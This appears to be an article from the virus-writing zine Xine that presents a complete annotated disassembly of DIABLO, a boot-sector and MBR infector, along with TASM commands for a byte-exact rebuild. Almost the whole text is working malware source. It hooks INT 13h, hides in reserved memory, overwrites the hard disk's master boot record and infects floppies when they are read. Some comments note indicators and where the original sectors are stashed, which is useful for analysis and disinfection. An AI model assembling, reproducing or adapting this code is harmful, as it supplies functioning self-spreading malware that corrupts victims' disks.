
Xine - issue #4 - Phile 311


 
/-----------------------------\
| Xine - issue #4 - Phile 311 |
\-----------------------------/

Comment ¾

V █ ▀ █ █
I █ █ ▀▀▀▀▄ █ █ ▄▀▀▀▀▄
R ▄▄▄▄█ █ ▄▄▄█ █▄▄▄▄ █ █ █
U █ █ █ █ █ █ █ █ █ █
S ▀▄▄▄▄█ █ ▀▄▄▄█▄▄▄ █▄▄▄▄▀ █ ▀▄▄▄▄▀

══════════════════════════════════════════════════════════════════════════
Disassembled by Int13h/IKX
--------------------------------------------------------------------------

DIABLO is a rather simple BS/MBR infector. This virus is in the wild in
Paraguay, so I decided to disassemble it, because I had never published a
disassembly and there is always a first time :) It fits in one sector.
You can get a byte-for-byte matching re-assembly by compiling it with TASM 4.0:

tasm /zi /m3 diablo
tlink /v diablo
tdstrip /c diablo

¾

.model tiny
.code
org 0

; Entry point. The BIOS loads the sector at 0:7C00 and starts at offset 0.
; Bytes 0..2 are the only part of the host sector's header the virus
; overwrites (AllOK copies exactly 3 bytes from offset 0 into a victim),
; so this is expected to assemble as a 3-byte near jump over the BPB.
DIABLO: jmp Virus_Begin

; Here must go the disk parameter block (BPB, bytes 03h..3Dh). The virus
; leaves the host's own BPB in place, so an infected sector still describes
; its disk correctly; only the code from 3Eh onwards is replaced.

org 03eh

;-----------------------------------------------------------------------
; Virus_Begin - boot-time installer, running at 0:7C00 as the boot sector.
; Saves the INT 13h vector inside the image, takes 2 KB off the BIOS
; base-memory count at 0:413, copies the sector to the freed top-of-memory
; segment, points INT 13h at CD13Handler in that copy and far-jumps there.
; Indicators an analyst can check: base memory at 0:413 is 2 KB short and
; the INT 13h vector segment equals (that KB count) << 6.
; Stack side effect: leaves 0:7C00 pushed for the retf in ViralSegment.
;-----------------------------------------------------------------------
Virus_Begin:
cli
xor ax,ax
mov ds,ax ; DS=IVT
mov ax,word ptr ds:[004ch] ; AX=INT 13h's offset
mov cs:[07c00h+CD13Offs],ax ; saved into the image itself (NonRead reuses it as a far-jmp operand)
mov ax,word ptr ds:[004eh] ; AX=INT 13h's segment
mov cs:[07c00h+CD13Segm],ax
; The word at 0:413 (base memory in KB) is rebuilt from two byte loads;
; after the xchg, AX holds that word and CL still holds byte 0:412 intact.
mov ax,word ptr ds:[0412h] ; AH = byte in 0:0x413
mov cx,ax
mov al,byte ptr ds:[0414h] ; AL = the other byte in 0:0x414
xchg ah,al ; AX = total system memory in KBs
sub ax,0002 ; Subtract 2KB
mov ch,al
mov word ptr ds:[0412h],cx ; Put the new amount of
mov byte ptr ds:[0414h],ah ; memory, with 2KBs less
mov cl,06 ; For the shifting left
shl ax,cl ; KB -> paragraphs: segment of the reserved 2 KB
mov es,ax ; ES = place for virus
mov word ptr ds:[004eh],ax ; Change INT 13h's segment
mov ax,offset CD13Handler ; New INT 13h's handler
mov word ptr ds:[004ch],ax ; Change INT 13h's offset
sti

xor di,di
mov bx,07c00h ; Points to virus beginning
mov si,bx
mov cx,0100h ; 100h words = the whole 512-byte sector
push ds ; 0:7C00 stays on the stack; the retf instructions in
push bx ; ViralSegment pop it to continue at 0:7C00 later
cld
repz movsw ; Copy virus to ES:DI

push es ; far return into the high copy: ES:ViralSegment
mov ax,offset ViralSegment
push ax
retf ; Jmp to viral code at TOM

;-----------------------------------------------------------------------
; ViralSegment - runs in the high copy (CS = TOM segment, DS = 0).
; Reads the stashed original boot sector / MBR back to 0:7C00, infects the
; first hard disk's MBR if it is not already infected, then far-returns to
; 0:7C00 so the normal boot goes on.
; Image offsets the code relies on (byte-exact assembly, per the intro):
;   cs:[0013h] presumably the BPB total-sectors field (0960h = 2400 = 1.2 MB)
;   cs:[01b0h] drive byte: 0 = this copy came from a floppy, 80h = from HDD
;   cs:[0200h] 512-byte scratch buffer right after the image
; Where the originals are stashed (what a cleaner needs):
;   floppy: cyl 0 / head 1 / sector 14     hard disk: cyl 0 / head 0 / sector 2
;-----------------------------------------------------------------------
ViralSegment:
push ds ; Jumped!
pop es ; DS=ES=0
cmp word ptr cs:[0013h],0960h ; at least 2400 sectors (1.2 MB floppy or larger)?
jnb NonRETF
; NOTE(review): at this point 0:7C00 still holds this same virus sector
; (nothing has been read over it yet), so this retf appears to re-enter
; Virus_Begin - installing another 2 KB copy - rather than boot the host.
retf ; jmp to 0:07c00

NonRETF:mov dh,01 ; Head 1
mov cx,000eh ; Cylinder 0, sector 14 - stash location of the floppy boot sector

cmp byte ptr cs:[01b0h],00 ; drive byte 0: this copy booted from a floppy
jz Here

mov cx,0002 ; Cylinder 0, sector 2 - stash location of the original MBR
mov dh,00 ; Head 0
Here: mov dl,cs:[01b0h] ; Drive in dl
mov bx,07c00h ; 7C00 to bx
mov ax,0201h ; Read 1 sec
int 13h ; INT 13h is already hooked: with DL=0 this read also runs LetsCheck

push cs cs ; ES=DS=CS (TASM multi-operand push/pop)
pop es ds

mov ax,0201h ; Read 1 sector
mov cx,0001h ; Cylinder 0, sector 1
mov dx,0080h ; Head 0, drive C:
mov bx,0200h ; Buffer below the virus
int 13h

mov ax,cs:[0200h] ; first word of the real MBR
cmp cs:[0],ax ; ¿Infected? (same first word as this image's jmp)
jz Identic

mov ax,0301h ; Write 1 sector
mov cx,0002h ; Cylinder 0, sector 2
mov dx,0080h ; Head 0, drive C:
mov bx,0200h ; Buffer under virus
int 13h ; stash the original MBR in sector 2 (whatever was there is overwritten)

mov si,03beh ; Copy the real MBR's partition table + boot mark
mov di,01beh ; (bytes 1BEh..1FFh, 21h words) into the image
mov cx,0021h
repz movsw

mov byte ptr cs:[01b0h],080h ; mark the image as the hard-disk variant
mov ax,0301h ; Write 1 sector
mov cx,0001h ; Cylinder 0, sector 1
mov dx,0080h ; Head 0, drive C:
mov bx,0 ; XOR BX,BX/SUB BX,BX!
int 13h ; write the infected MBR from CS:0

Identic:mov byte ptr ds:[01b0h],0 ; DS=CS: clear the drive byte in the resident copy again
nop ; unreachable padding; presumably keeps the byte-exact layout
retf ; to 0:7C00 = the original boot sector / MBR read above

;-----------------------------------------------------------------------
; CD13Handler - resident INT 13h hook.
; Only AH=02h (read) on DL=0 (drive A:) is intercepted: the real handler
; runs first, then LetsCheck tries to infect that floppy. Every other
; request is chained straight to the original vector at NonRead.
; The caller gets the real handler's registers and flags: LetsCheck
; preserves registers, pushf/popf keep the flags across it, and "retf 2"
; discards the flags word the INT instruction pushed.
;-----------------------------------------------------------------------
CD13Handler:
cmp ah,02h ; Sector read?
Jne NonRead
cmp dl,0 ; Drive A:?
Jne NonRead
pushf ; Simulate the int
call dword Ptr cs:[CD13Offs] ; Call the real Inty

pushf ; keep the real handler's flags (CF = error) across LetsCheck
call LetsCheck
popf
retf 2 ; return with those flags, dropping the INT-pushed flags

; 0EAh is the opcode of JMP FAR ptr16:16; the two saved vector words that
; follow are its operand, so NonRead is a far jump to the original INT 13h.
; Code and data overlap: the saved vector lives inside the instruction.
NonRead:db 0eah
CD13Offs dw 0
CD13Segm dw 0

;-----------------------------------------------------------------------
; LetsCheck - floppy infection routine, called from CD13Handler after any
; read of drive A:. All its own disk I/O goes through the saved original
; vector (pushf / call far) so it is not re-hooked.
; Steps: re-read the A: boot sector into CS:0200h; skip disks whose
; buffer+13h word is below 0960h (presumably BPB total sectors, i.e. smaller
; than 1.2 MB); skip disks already carrying the 6-byte marker at 1AAh;
; stash the original boot sector at cyl 0 / head 1 / sector 14; build the
; infected sector in the buffer (3-byte jmp + body 3Eh..1B0h, host BPB and
; tail kept); write it back to sector 1.
; Disinfection note: the host boot sector ends up at C0/H1/S14. On a
; 15-sector-per-track 1.2 MB format that is LBA 28, which falls inside the
; root directory, so directory entries stored there are lost (my
; arithmetic - verify before relying on it).
; Preserves all general registers and segments; flags are left as is.
;-----------------------------------------------------------------------
LetsCheck:
push ax bx cx dx ds es si di ; TASM multi-operand push

mov ax,cs
mov es,ax
mov ds,ax ; DS=ES=CS
mov ax,0201h ; Read 1 sector
mov cx,0001h ; Cylinder 0, sector 1
mov dx,0000h ; Head 0, drive A:
mov bx,0200h ; Virus's buffer
pushf
call dword Ptr cs:[CD13Offs] ; original handler, bypassing the hook
jnc Okis
jmp EternoRetorno ; read failed: give up
nop ; unreachable padding; presumably keeps the byte-exact layout

Okis: cmp word ptr cs:[0213h],0960h ; same field as cs:[13h], but in the sector just read
Jb EternoRetorno ; smaller disk: leave it alone

mov si,01aah ; 6-byte marker in the image ('DIABLO', given the byte-exact layout) ...
mov di,03aah ; ... against the same offset in the read sector
mov cx,3
repz cmpsw ; Compare for DIABLO
jnz NonInfected
jmp EternoRetorno ; Already infected
nop ; unreachable padding; presumably keeps the byte-exact layout

NonInfected:
mov ax,0301h ; Write 1 sector
mov cx,000eh ; Cylinder 0, sector 14
mov dx,0100h ; Head 1, drive A:
mov bx,0200h ; Buffer where the boot was read
pushf
call dword ptr cs:[CD13Offs] ; Real inty
jnc AllOK

jmp EternoRetorno ; stash write failed: do not infect, or the host sector would be lost
nop ; unreachable padding; presumably keeps the byte-exact layout

AllOK: xor si,si ; bytes 0..2 of the image (the jmp to Virus_Begin) ...
mov di,0200h ; ... over bytes 0..2 of the host sector in the buffer
mov cx,3
repz movsb

mov si,003eh ; body from Virus_Begin ...
mov di,023eh
mov cx,0173h ; ... 173h bytes = offsets 3Eh..1B0h, marker and drive byte included
repz movsb ; host BPB (03h..3Dh) and tail (1B1h..1FFh) are left untouched

mov ax,0301h ; Write 1 sector
mov cx,0001h ; Cylinder 0, sector 1
xor dx,dx ; Head 0, drive A:
mov bx,0200h
pushf ; Call the real inty
call dword ptr cs:[CD13Offs] ; write the infected sector; the result is not checked

EternoRetorno:
pop di si es ds dx cx bx ax
ret

db 'DIABLO' ; In spanish, diablo=devil. Also the 6-byte infection marker LetsCheck
; compares at offset 1AAh (assuming the byte-exact layout the intro claims).
; The byte right after it (offset 1B0h, presumably zero in the assembled
; image) is the drive byte that ViralSegment/Identic read and write.

org 01feh
db 055h,0aah ; Boot mark
org 200h
End DIABLO


